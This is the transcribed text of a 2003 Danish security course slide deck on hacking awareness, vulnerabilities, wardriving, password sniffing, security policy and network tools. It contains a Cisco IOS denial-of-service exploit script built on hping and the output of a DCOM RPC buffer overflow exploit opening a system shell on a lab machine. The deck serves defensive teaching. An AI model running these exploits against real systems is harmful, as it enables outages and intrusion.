Beskyt dig selv - lær at hacke - Prosa i Odense · 2010-04-28 · firewall regelsæt eksempel fra...
Transcript of Beskyt dig selv - lær at hacke - Prosa i Odense · 2010-04-28 · firewall regelsæt eksempel fra...
Velkommen til
Beskyt dig selv - lær at hacke
Henrik Lund Kramshøj, CISSP
$Id: it-sikkerhed.tex,v 1.6 2003/12/03 11:09:55 hlk Exp $
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 1
Planen for idag
Agenda:
• Indledning
• Internet idag - aktuelle hændelser
• Sarbarheder og CVE
• Wireless sikkerhed - wardriving demo
• Windows DCOM - dcom.c demo
• Fokusanbefalinger sikkerhedspolitik m.m.
• POP3 protokollen - dsniff demo
• Penetrationstest - portscanning, Nessus m.v
• opsummering og afslutning
spørgsmal er velkomne, interaktiv undervisning :)
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 2
Forudsætninger for idag
ingen forudsætninger
Vi gennemgar mange forskellige ting - ofte i detaljer
men slap af hvis I ikke forstar dem eller spørg ,
Til penetrationstest og det meste Internet-sikkerhedsarbejde er derdog følgende forudsætninger
• Netværkserfaring
• TCP/IP principper - ofte i detaljer
• Programmmeringserfaring er en fordel
• UNIX kendskab er ofte en nødvendighed- fordi de nyeste værktøjer er skrevet til UNIX i form af Linux og BSD
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 3
Kursusfaciliteter
Internet ellervirksomheden
arbejdspladserScanning serverOpenBSD 3.4Stuart
Firewall/routerSoekris medOpenBSD 3.4
Router mellemnetværk
switch/hub
Servere der skal angribes
10.0.42.1
Windows server2000 Server+IIS
webserver
Andre servere10.0.43.1
demo netværk
DMZ
LAN
Der er lavet et lukket netværk til test og demonstrationer
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 4
Aftale om test af netværk
Straffelovens paragraf 263 Stk. 2. Med bøde eller fængsel indtil 6 m anederstraffes den, som uberettiget skaffer sig adgang til en andens oplysningereller programmer, der er bestemt til at bruges i et anlæg til elektroniskdatabehandling.
Hacking kan betyde:
• At man skal betale erstatning til personer eller virksomheder
• At man far konfiskeret sit udstyr af politiet
• At man, hvis man er over 15 ar og bliver dømt for hacking, kan fa en bøde - eller fængselsstrafi alvorlige tilfælde
• At man, hvis man er over 15 ar og bliver dømt for hacking, far en plettet straffeattest. Det kangive problemer, hvis man skal finde et job eller hvis man skal rejse til visse lande, fx USA ogAustralien
• Frit efter: http://www.stophacking.dk lavet af Det Kriminalpræventive Rad
• Frygten for terror har forstærket ovenstaende - sa lad være!
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 5
Hacker - cracker
Det korte svar - drop diskussionen
Det havde oprindeligt en anden betydning, men medierne har taget udtrykket til sig- og idag har det begge betydninger.
Idag er en hacker stadig en der bryder ind i systemer!ref. Spafford, Cheswick, Garfinkel, Stoll, ... - alle kendte navne indenfor sikkerhed
Hvis man vil vide mere kan man starte med:
• Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage, Clifford Stoll
• Hackers: Heroes of the Computer Revolution, Steven Levy
• Practical Unix and Internet Security, Simson Garfinkel, Gene Spafford, Alan Schwartz
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 6
Afmystificering
Et af formalene idag er:
Hackere og hacking skal afmystificeres
De fleste idag er ikke specielt brilliante, genier eller overhovedet sym-patiske!
Størstedelen udnytter software som andre har lavet uden tanke pakonsekvenserne for dem det gar udover
Hacking er hærværk!
Et andet formal er at stimulere jeres interesse for sikkerhed, privatlivog Internet
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 7
UNIX starthjælp
almindelige kommandoer:
• DOS/Windows kommando - tilsvarende UNIX, og forklaring
• dir - ls - star for list files, viser filnavne
• del - rm - star for remove, sletter filer
• ren - mv - move flytter filer til nyt navn, rename
• md - mkdir - make directory, lav en mappe/katalog
• cd - cd - change directory, skifter katalog
• type - cat - concatenate, viser indholdet af tekstfiler
• more - less - viser tekstfiler en side af gangen
• attrib - chmod - change mode, ændrer rettighederne pa filer
Prøv bare:
• ls list, eller long listing med ls -l
• cat /etc/hosts viser hosts filen
• chmod go-rwx id dsa - group og others har ingen (-) rettigheder til filen id dsa
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 8
Internet idag
Server Client
Internet
Clienter og servere
Rødder i akademiske miljøer
Protokoller der er op til 20 ar gamle
Meget lidt kryptering, mest pa http til brug ved e-handel
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 9
Internet er baseret p a abne standarder!
We reject kings, presidents, and voting.We believe in rough consensus and running code.– The IETF credo Dave Clark, 1992.
Request for comments - RFC - er en serie af dokumenter
RFC, BCP, FYI, informational - helt tilbage fra 1969
Ændres ikke, men far status Obsoleted nar der udkommer en nyereversion af en standard
Standards track:Proposed Standard→ Draft Standard→ Standard
Abne standarder er en sikkerhed for abenhed, ikke sikkerhed
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 10
The Internet Worm 2. november 1988
Udnyttede følgende sarbarheder
• buffer overflow i fingerd - VAX kode
• Sendmail - DEBUG
• Tillid mellem systemer: rsh, rexec, ...
• darlige passwords
Avanceret + camouflage!
• Programnavnet sat til ’sh’
• Brugte fork() til at skifte PID jævnligt
• password cracking med intern liste med 432 ord og /usr/dict/words
• Fandt systemer i /etc/hosts.equiv, .rhosts, .forward, netstat ...
Lavet af Robert T. Morris, Jr.
Medførte dannelsen af CERT, http://www.cert.org
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 11
CERT/CC - www.cert.org
Stiftet som reaktion pa The Internet Worm i 1988
betragtet som de seriøse - og konservative
informerer om sarbarheder og trusler
koordinerer aktiviteter - mellem leverandører
opsamler statistik for hacker aktivitet
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 12
CERT advisories i 2003
• CA-2003-01 :Buffer Overflows in ISC DHCPD Minires Library January 15, 2003
• CA-2003-02 :Double-Free Bug in CVS Server January 22, 2003
• CA-2003-03 :Buffer Overflow in Windows Locator Service January 23, 2003
• CA-2003-04 :MS-SQL Server Worm January 25, 2003 - SQL Sapphire/Slammer
• CA-2003-05 :Multiple Vulnerabilities in Oracle Servers February 19, 2003
• CA-2003-06 :Multiple vulnerabilities in implementations of the Session Initiation Protocol (SIP)February 21, 2003
• CA-2003-07 :Remote Buffer Overflow in Sendmail March 3, 2003
• CA-2003-08 :Increased Activity Targeting Windows Shares March 11, 2003
• CA-2003-09 :Buffer Overflow in Core Microsoft Windows DLL Updated March 19, 2003 Re-leased March 17, 2003
• CA-2003-10 :Integer overflow in Sun RPC XDR library routines March 19, 2003
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 13
En aktuel s arbarhed - Cisco Denial of serviceCAN-2003-0567 - juli 2003
Cisco routere - ude af drift angreb• Med en bestemt sekvens af pakker til routerens egen adresse pa et interface kan den bringes
i en tilstand hvor den ikke sender pakker videre - dødt interface
• Sarbare systemer?This issue affects all Cisco devices running Cisco IOS software and configured to processInternet Protocol version 4 (IPv4) packets. This includes routers as well as switches and linecards which run Cisco IOS software. Cisco devices which do not run Cisco IOS software arenot affected.
• kræver genstart
• pakkerne kan sagar genereres med et shellscript (batch fil) og programmer som hping
Kilder:http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtmlhttp://www.cert.org/advisories/CA-2003-15.htmlhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0567
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 14
Cisco exploit script
#!/bin/sh# 2003-07-21 pdonahue# cisco-44020.sh# -- this shell script is just a wrapper for hping (http://www.hping.org)# with the parameters necessary to fill the input queue on# exploitable IOS device# -- refer to "Cisco Security Advisory: Cisco IOS Interface Blocked by# IPv4 Packets"# (http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml)#for more information...for protocol in $PROT
do$HPING $HOST --rawip $ADDR --ttl $TTL --ipproto $protocol
--count $NUMB --interval u250 --data $SIZE --file /dev/urandomdone
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 15
Sarbarheder - CVE og ICAT
Common Vulnerabilities and Exposures (CVE) er:• klassifikation
• unik navngivning af sarbarheder.
Sarbarheder tildeles• initielt et kandidat ”CAN” nummer
• senere ændres dette til et ”CVE” nummer - typisk først CVE nar leverandøren erkender at deter en sarbarhed.
CVE vedligeholdes af MITRE - som er en not-for-profit organisationskabt til forskning og udvikling i USA. ICAT Metabase er en af mu-lighederne for at søge i CVE. ICAT vedligeholdes af NIST
CVE er et kvantespring indenfor sikkerhed - og en stor succes!
Kilde:http://cve.mitre.org/ - CVE
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 16
Sarbarheder - eksempler
CVE-2000-0884IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possiblyexecute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, akathe ”Web Server Folder Traversal” vulnerability.
CAN-2002-1182IIS 5.0 and 5.1 allows remote attackers to cause a denial of service (crash) via malformed WebDAVrequests that cause a large amount of memory to be assigned.
CVE Version: 20020625 Total Entries: 2223 opdateres ikke sa ofte, ICAT opdateres løbende og erkompatibel med CVE
ICAT contains: 5356 vulnerabilities Last updated: 01/07/03
Kilde:http://cve.mitre.org/ - CVEhttp://icat.nist.gov/icat.cfm - ICAT
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 17
Wireless networking sikkerhed i 802.11b
netværket - typisk Ethernet
Wireless Access Point
Sikkerheden er baseret pa nogle fa forudsætninger• SSID - netnavnet
• WEP kryptering - Wired Equivalent Privacy
• maske MAC flitrering, kun bestemte kort ma tilga accesspoint
Til gengæld er disse forudsætninger ofte ikke tilstrækkelige ...• WEP er ok til et hjemmenetværk
• WEP er baseret pa en DELT hemmelighed som alle stationer kender
• nøglen ændres sjældent, og det er svært at distribuere en ny
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 18
WLAN sikkerhed
AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys.AirSnort operates by passively monitoring transmissions, computing the en-cryption key when enough packets have been gathered.
802.11b, using the Wired Equivalent Protocol (WEP), is crippled with numer-ous security flaws. Most damning of these is the weakness described in ”Weaknesses in the Key Scheduling Algorithm of RC4 ” by Scott Fluhrer, ItsikMantin and Adi Shamir. Adam Stubblefield was the first to implement this at-tack, but he has not made his software public. AirSnort, along with WEPCrack,which was released about the same time as AirSnort, are the first publiclyavailable implementaions of this attack. http://airsnort.shmoo.com/
i dag er firmware opdateret hos de fleste producenter
men sikkerheden baseres stadig pa een delt hemmelighed
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 19
Demo: wardriving med stumbler programmer
man tager et tradløst netkort og en bærbar computer, evt. en iPaq
man kører en tur med:• Netstumbler - Windows http://www.netstumbler.com
• dstumbler - UNIX http://www.dachb0den.com/projects/dstumbler.html
• MacStumbler - Mac http://www.macstumbler.com/
• ... mange andre
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 20
Start p a demo - wardriving
wardriver
Virksomhedeneller Internet
server gøres tilaccess point
Standard UNIX eller windows PC kan bruges som host basedaccesspoint - med det rigtige kort!
"Stumbler"program
• To almindelige laptops bruges til demo
• Tradløse kort i begge maskiner - DWL-650 og AirPort i iBook
• Der startes et access point pa den anden bærbare
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 21
Resultater af wardriving
Hvad opdager man ved wardriving?
• at WEP IKKE krypterer hele pakken
• at alle pakker indeholder MAC adressen
• WEP nøglen skifter sjældent
• ca. 2/3 af de netværk man finder har ikke WEP slaet til - og der er fri og uhindret adgang tilInternet
Man kan altsa lytte med pa et netværk med WEP, genbruge en andenmaskines MAC adresse - og maske endda bryde WEP krypteringen.
Medmindre man kender virksomheden og WEP nøglen ikke er skiftet... det er besværligt at skifte den, idet alle stationer skal opdateres.
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 22
Anbefalinger mht. tr adløse netværk
Internet
virksomheden
firewall
rigtigt
forkert
• Brug noget tilfældigt som SSID - netnavnet
• Brug ikke WEP til virksomhedens netværk- men istedet en VPN løsning med individuel autentifi-cering
• Placer de tradløse adgangspunkter hensigtsmæssigt inetværket - sa de kan overvages
• Lav et sæt regler for brugen af tradløse netværk - hvorma medarbejdere bruge det?
• Se eventuelt pjecerne Beskyt dit tradløse Netværkfra Ministeriet for Videnskab, Teknologi og Udvikling.http://www.videnskabsministeriet.dk/
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 23
En aktuel s arbarhed - Microsoft Windows RPCCAN-2003-0352 - juli 2003
Hackergruppe ”Last Stage of Delirium” finder en sarbarhed i MicrosoftWindows RPC
Den 27. juni skrev LSD til Microsoft om en kritisk fejl i Windows.• Microsoft har frigivet rettelser i juli.
• LSD har ry for at arbejde seriøst sammen med produkt-leverandørerne. De kommunikerersarbarheder til leverandørerne og frigiver ikke ”exploit-programmer” før leverandørerne harfaet en fair chance til at løse deres problemer.
• Beskrivelse af sarbarheden kan findes hos Microsoft pa:http://microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-026.asp
Kilder:http://www.securityfocus.com/news/6519http://www.cert.org/advisories/CA-2003-16.htmlhttp://lsd-pl.net/ - detaljerede beskrivelser af exploits
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 24
Start p a demo
Server Client
Internet
• To almindelige computere - en switch erstatter Internet
• Windows er installeret pa et system og ikke opdateret
• dcom.c exploit er hentet fra Internet og bruges næsten uændret
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 25
Hvad sker der?
[hlk@fiona hlk]$ ./dcom 6 10.0.0.206---------------------------------------------------------- Remote DCOM RPC Buffer Overflow Exploit- Original code by FlashSky and Benjurry- Rewritten by HDM <hdm [at] metasploit.com>- Using return address of 0x77e626ba- Dropping to System Shell...
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>exit - find selv p a kommandoer, fri adgang!!exit
- Read failure[hlk@fiona hlk]$
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 26
RPC sarbarheden udnyttes stadig
*WINDOWS RPC FLAW EXPLOITED IN CAMPUS HACKER ATTACKS Cali-fornia universities are among the first public victims of the Windows RemoteProcedure Call (RPC) protocol flaw, which allows an attacker to run code ofchoice on a compromised system.
Cedric Bennett, director of information security at Stanford University, says2,400 of his school’s computers were tainted with deeply imbedded code. Theunauthorized code, which Bennett declined to describe in detail, will have tobe manually removed, a process that could take several hours for each com-promised machine. ...
Citat fra: SECURITY WIRE DIGEST, VOL. 5, NO. 60, AUGUST 11, 2003 SecurityWire Digest is a newsletter published by Information Security, the industry’s leadingsource of security news and information. http://infosecuritymag.techtarget.com
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 27
I Danmark - p a lokalnettet
Pa et /24 - dvs ca. 250 adresser blev følgende systemer fundetsarbare 84, 90, 104, 130, 186, 197, 198, 201, 203, 206, 207, 217,218, 219, 220, 224, 225, 226, 229, 230, 235, 237, 244, 248, 252
25 sarbare systemer hos et firma - den 30/7 2003
ialt var der omkring 170 systemer pa det pagældende LAN
Kilde: SiGNOUT pa IRC
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 28
Windows RPC/dcom - blev ogs a en orm
Kilde: Symantec - 12/8 2003
• THREAT: W32.Blaster.Worm
• CATEGORY: 3 W32.Blaster.Worm is a worm that will exploit the DCOM RPC vulnerabilityusing TCP port 135. It will attempt to download and run a file, msblast.exe.
• STEP 1: Read Critical Information
• STEP 2: Update your Virus Definitions
Situationen er den sædvanlige - den almindelige livscyklus for ensarbarhed
10 Der findes en sarbarhed - hackergruppe, leverandør eller sikkerhedskonsulent
• Leverandøren kontaktes og pa et tidspunkt offentliggøres informationen
• Der kommer proof-of-concept kode (PoC), exploit program
• Sarbarheden bliver populær
• Der kommer en orm - og folk gar i panik
• goto 10
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 29
Security holes... Who cares? - november sidste ar
Forhistorien:• OpenSSL sarbarheder fra juli 2002
• Slapper worm fra september 2002
• Hvormange opdaterer og hvornar?
Kilde: Eric Rescorla, ”Security holes... Who cares?”http://www.rtfm.com/upgrade.pdf
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 30
Recovering from break-ins
DU KAN IKKE HAVE TILLID TIL NOGET
Pa CERT website kan man finde mange gode ressourcer omkringsikkerhed og hvad man skal gøre med kompromiterede servere
Eksempelvis listen over dokumenter fra adressen:http://www.cert.org/nav/recovering.html
• The Intruder Detection Checklist
• Windows NT Intruder Detection Checklist
• The UNIX Configuration Guidelines
• Windows NT Configuration Guidelines
• The List of Security Tools
• Windows NT Security and Configuration Resources
Hvis man mener man star med en kompromitteret server kan følgendevære nødvendigt http://www.cert.org/tech tips/root compromise.html
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 31
Fundamentale principper indenfor sikkerhed
fortrolighed
tilgængelighedintegritet
• fortrolighed/hemmeligholdelse - man ønsker nogle oplysninger hemmeligholdt
• integritet - det at noget ikke er ændret
• tilgængelighed - der skal sikres adgang til ressourcer
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 32
Social engineering
En større trussel end antaget?
Medarbejdere uden viden er en trussel mod sikkerheden, eller medar-bejdere uden awareness
The Art of Deception: Controlling the Human Element of Security afKevin D. Mitnick, William L. Simon, Steve Wozniak
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 33
teknologi eksempler
Der findes mange sikkerhedsprodukter
• firewalls
• anti-virus
• adgangskontrolsystemer
• fysiske lase
• ...
Men hvordan skal det hele bruges?
Tænk langsigtet!
god sikkerhed kommer fra langsigtede intiativer
Brug sikkerhedsprincipperne til at afgøre hvad der er vigtigst for jer
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 34
Definition: sikkerhedspolitik
IT-sikkerhedspolitik
Sikkerhedspolitik
Definition:Et sæt regler for virksomheden
Definition:it-sikkerhedspolitik en politik der er be-grænset til IT-omraderne i virksomheden
- kan være en del af CYA strategi, cover yourassets ;-)
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 35
Hvad er en sikkerhedspolitik?
Et sæt regler, omfatter typisk
• Ansvarsfordeling
• Identifikation og klassifikation af værdier
• Klassifikation af data, hemmeligt, følsomt, offentligt
• Personalesikkerhed
• Fysisk sikkerhed
• Drift
• Adgangskontrol - IT, data, netværk, bygninger, ...
• Beredskabsplanlægning
• Overholdelse af lovgivning
mange virksomheder starter med at udarbejde og implementere en IT-sikkerhedspolitik
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 36
Følg med! - Vær proaktiv
www.incidents.org følger hele tiden medi angreb - man kan selv hente softwareog bidrage med logs
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 37
Følg med! - Hvordan ser en orm ud p a nettet?
Internet statistik fra januar - SQL Sapphire/Slammer ormenKilde: http://average.matrix.net/Daily/markR.html
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 38
Hændelsesh andtering
Internet
virksomheden
kunder
leverandører
partnere
Du VIL komme ud for hændelser, man kan ikke regne med at sikker-hedsforanstaltninger altid virker
Der er hændelser - men opdager I dem?• Der ER sket en hændelse - handterer I den optimalt? - hvad er forøvrigt optimalt?
• Lav en plan over handtering af hændelser
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 39
Hændelsesh andtering - en metode
Vær forberedt pa at handtere hændelser!
Incident Response, E. Eugene Schultz og Russel Shumway foreslar:
• Preparation - forberedelse lær at snakke med politiet, hav kontaktinformation pa plads, mo-biltelefonnumre m.v.
• Detection - man opdager, her kan integritetscheckere og IDS hjælpe
• Containment - indkapsling, undga spredning til andre systemer
• Eradication - udryddelse af problemet, eventuelt reinstallation af systemer
• Recovery - sæt systemerne i produktion igen
• Follow-up - undga det sker igen, opsamling af statistik om hændelser
Incident Response: A Strategic Guide to Handling System and Net-work Security Breaches af E. Eugene, Dr Schultz, Russell Shumway,Que, 2002
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 40
Sikkerhedspolitik: herunder software og e-mail politik
Manglende e-mail politik: brevhemmelighed er beskrevet i straf-feloven, og e-mail er omfattet! Uberettiget fyring kan ligeledes væredyrt for virksomheden
Besøg fra Antipiratgruppen - kan resultere i dummebøder eller fyring
Brug af Internet - er der bandbredde til at arbejde, hvis alle sidder ogser Tour de France pa Internet?
Der skal være et sæt regler - sa medarbejdere ved hvad der forventesaf dem
Der skal ofte udføres en risikoanalyse for at sikre at alle omraderdækkes med sikkerhedspolitikken
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 41
Sikkerhedspolitik - en m ade at anskue det p a
Politik
ProcedurerStandarder
Detaljerede retningslinier
Overordnede strategiske niveau
Meget detaljeredeoperationelle
Regler
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 42
POP3 protokollen
Post Office protocol version 3 - POP3
• Denne protokol benyttes af næsten ALLE danskere der har Internet hjemme
• POP3 protokollen bruges til at kontakte et posthus og derefter hente posten
• Denne protokol sender brugernavn og kodeord i klar tekst, dvs uden kryptering
• Denne protokol sender indeholdet af alle e-mail og vedhæftede filer i klar tekst uden kryptering
• Der findes en version af POP3 der benytter SSL, svarende til HTTPS der angiver at enwebsession er krypteret
Der sendes i hver eneste afhentning af post følgende sekvens:
• USER demo• PASS secr3t!
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 43
Start p a demo
Server Client
Internet
server inficeresmed Dsniff
• To almindelige systemer rødt kabel er Internet
• dsniff programmet installeres pa server og startes - dsniff kunne installeres i netværket, paserver eller pa client
• Der vises opsamling af data fra POP3 og telnet sessioner
• Det kendte/berygtede dsniff program bruges som eksempel pa de overvagningsprogrammerder kunne tænkes anvendt - se slide om dsniff i den udleverede præsentation
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 44
Kommenteret dsniff
Her er opsamlet et kodeord til e-mail
Her er opsamlet kodeord ogkommandoer fra en session
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 45
dsniff forudsætninger
Pa UNIX systemer med dsniff installeret kan man læse manualen -skriv man arpspoof og man dsniff
• Hvilke forudsætninger er der for at bruge Dsniff?
• Systemerne skal have adgang til de data som sendes, enten ved ARP spoofing eller ad andenvej
MAC adresser - Ethernet
IP adresser10.0.0.1 10.0.0.2
00:30:65:22:94:a1 00:40:70:12:95:1c
Server Client10.0.0.2 er på01:02:03:04:05:06
10.0.0.1 er på01:02:03:04:05:06
forfalskede ARP pakker
01:02:03:04:05:06
Hacker
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 46
Programmer der kan hjælpe
Programmer der kan hjælpe:
• POP3 over SSL - internetudbydere bør tilbyde det
• brug HTTP over SSL - det gør mange til ehandel, men ogsa webmail - hotmail og lignendebør beskyttes
• Brug Pretty Good Privacy PGP eller Gnu Privacy Guard GPG til e-mail kommunikation
Følg med pa http://www.1984.dk
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 47
Secure Shell - SSH og SCP
SSH afløser en række protokoller som er usikre:• Telnet til terminal adgang, r* programmerne, rsh, rcp, rlogin, FTP med brugerid/password
• WinSCP til Windows er nemt at bruge
• Husk: SSH er bade navnet pa protokollerne - version 1 og 2 samt programmet ssh til at loggeind pa andre systemer
• SSH tillader ogsa port-forward, tunnel til usikre protokoller, eksempelvis X protokollen til UNIXgrafiske vinduer
• NB: Man bør idag bruge SSH protokol version 2! med nøgler fremfor kodeord
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 48
Forsvar mod overv agning
Hvordan beskytter man sig mod overvagning?
Det kan man ikke! - men man kan:
• beskytte indholdet ved at kryptere sine informationer
• signere sine breve og data, modifikation kan ikke foretages uden nøglen
• Man skal kræve at samarbejdspartnere bruger kryptering
• alle internetudbydere i Danmark BURDE tilbyde POP3 over SSL!
• holde sit system rent for fremmede programmer, være varsom med at abne vedhæftede filer- ikke installere mere end nødvendigt
• holde opsyn med sin computer - ligesom man gør med sine andre ejendele
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 49
Hvad er værdien af pentest?
hvor og hvordan kan I bruge penetrationstest
hvis man vil have et andet indblik i netværket, TCP, UDP, ICMP,portscannning og samle puslespil udfra fa informationer
Netværksadministratorer kan bruge pentesting til at sikre egnenetværk ved brug af samme teknikker som hackere, man skal kendetruslerne for at bygge netværk der IKKE er sarbare
IT-/sikkerheds-chef vurdere og evaluere tilbud og løsninger for sikker-heden. Er den patænkte løsning fornuftig?
Man star med en server der er kompromitteret - hvordan skete det? -hvordan forhindrer vi det en anden gang. Vurdere hvilke andre syste-mer der kan være kompromitterede
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 50
OSI og Internet modellerne
Applications
ARP RARP
IPv4 IPv6
TCP UDP
Internet protocol suiteOSI ReferenceModel
Application
Presentation
Session
Transport
Network
Link
Physical
HTTP, SMTP,FTP,SNMP,
ICMPICMPv6
NFS
XDR
RPC
Ethernet token-ring ATM ...
MAC
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 51
TCPDUMP - verdens bedste pakkesniffer?
Maske den bedste pakkesniffer i verden http://www.tcpdump.org- er med i Mac OS X som standard
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 52
TCPDUMP syntaks - udtryk (eng: expressions)
filtre til husbehov, host, net, port, source, destination, protokol, logiskekombinationer med and, or, not
Eksempel tcpdump host 10.2.3.4 and not host 10.3.4.5Alle pakker til/fra 10.2.3.4 undtagen dem til/fra 10.3.4.5- meget praktisk hvis man er logget ind pa 10.2.3.4 via netværk fra10.3.4.5
host foo and not port ftp and not port ftp-datatraffik til/fra maskine foo undtagen hvis det er FTP traffik
[root@otto hlk]# tcpdump -i en0tcpdump: listening on en013:29:39.947037 fe80::210:a7ff:fe0b:8a5c > ff02::1: icmp6: router advertisement13:29:40.442920 10.0.0.200.49165 > dns1.cybercity.dk.domain: 1189+[|domain]13:29:40.487150 dns1.cybercity.dk.domain > 10.0.0.200.49165: 1189 NXDomain*[|domain]13:29:40.514494 10.0.0.200.49165 > dns1.cybercity.dk.domain: 24765+[|domain]
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 53
Ethereal - grafisk pakkesniffer
Maske den bedste grafiske pakkesniffer i verden http://www.ethereal.com
Bade til Windows og UNIX platforme
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 54
Programhygiejne!
Download, installer - kør! - farligt!
Sadan gøres det:
• download program OG eventuel signaturfil/MD5
• verificer signatur eller MD5 - mange glemmer det
• installer programmet
• brug programmet fornuftigt - med gode indstillinger
• Hold programmet opdateret!
• Især exploit programmer indeholder ofte trojanske heste!
NB: ikke alle programmer har signaturer :(
MD5 er en envejs hash algoritme - kan detektere sma ændringer iinput og giver radikale forskelle i MD5 værdien
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 55
Brug af MD5 message digest funktion
• HASH algoritmer giver en unik værdi baseret pa input
• output fra algoritmerne kaldes ogsa message digest
• MD5 er et eksempel pa en meget brugt algoritme
• Hash funktioner er ikke reversible
• MD5 algoritmen har følgende egenskaber:
• output er 128-bit ”fingerprint” uanset længden af input
• output værdien ændres radikalt selv ved fa ændringer i input
• MD5 er blandt andet beskrevet i RFC-1321: The MD5 Message-Digest Algorithm
• Algoritmen MD5 er baseret pa MD4, begge udviklet af Ronald L. Rivest kendt fra blandt andetRSA Data Security, Inc
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 56
traceroute
traceroute programmet virker ved hjælp af TTL
levetiden for en pakke tælles ned i hver router pa vejen og ved at sættedenne lavt opnar man at pakken timer ud- besked fra hver router pa vejen
default er UDP pakker, men pa UNIX systemer er der ofte mulighedfor at bruge ICMP
traceroute 217.157.20.129traceroute to 217.157.20.129 (217.157.20.129),
30 hops max, 40 byte packets1 safri (10.0.0.11) 3.577 ms 0.565 ms 0.323 ms2 router (217.157.20.129) 1.481 ms 1.374 ms 1.261 ms
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 57
tcpdump af traceroute - med UDP
# tcpdump -i en0 host 217.157.20.129 or host 10.0.0.11tcpdump: listening on en023:23:30.426342 10.0.0.200.33849 > router.33435: udp 12 [ttl 1]23:23:30.426742 safri > 10.0.0.200: icmp: time exceeded in-transit23:23:30.436069 10.0.0.200.33849 > router.33436: udp 12 [ttl 1]23:23:30.436357 safri > 10.0.0.200: icmp: time exceeded in-transit23:23:30.437117 10.0.0.200.33849 > router.33437: udp 12 [ttl 1]23:23:30.437383 safri > 10.0.0.200: icmp: time exceeded in-transit23:23:30.437574 10.0.0.200.33849 > router.33438: udp 1223:23:30.438946 router > 10.0.0.200: icmp: router udp port 33438 unreachable23:23:30.451319 10.0.0.200.33849 > router.33439: udp 1223:23:30.452569 router > 10.0.0.200: icmp: router udp port 33439 unreachable23:23:30.452813 10.0.0.200.33849 > router.33440: udp 1223:23:30.454023 router > 10.0.0.200: icmp: router udp port 33440 unreachable23:23:31.379102 10.0.0.200.49214 > safri.domain: 6646+ PTR?
200.0.0.10.in-addr.arpa. (41)23:23:31.380410 safri.domain > 10.0.0.200.49214: 6646 NXDomain* 0/1/0 (93)14 packets received by filter0 packets dropped by kernel
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 58
Værdien af traceroute
diagnosticering af netværksproblemer - formalet med traceroute
indblik i netværkets opbygning!
svar fra hosts - en modtaget pakke fremfor et sort hul
Server1DNS1Mailserver1
Server2DNS2Mailserver2
Internet
firewallgateway
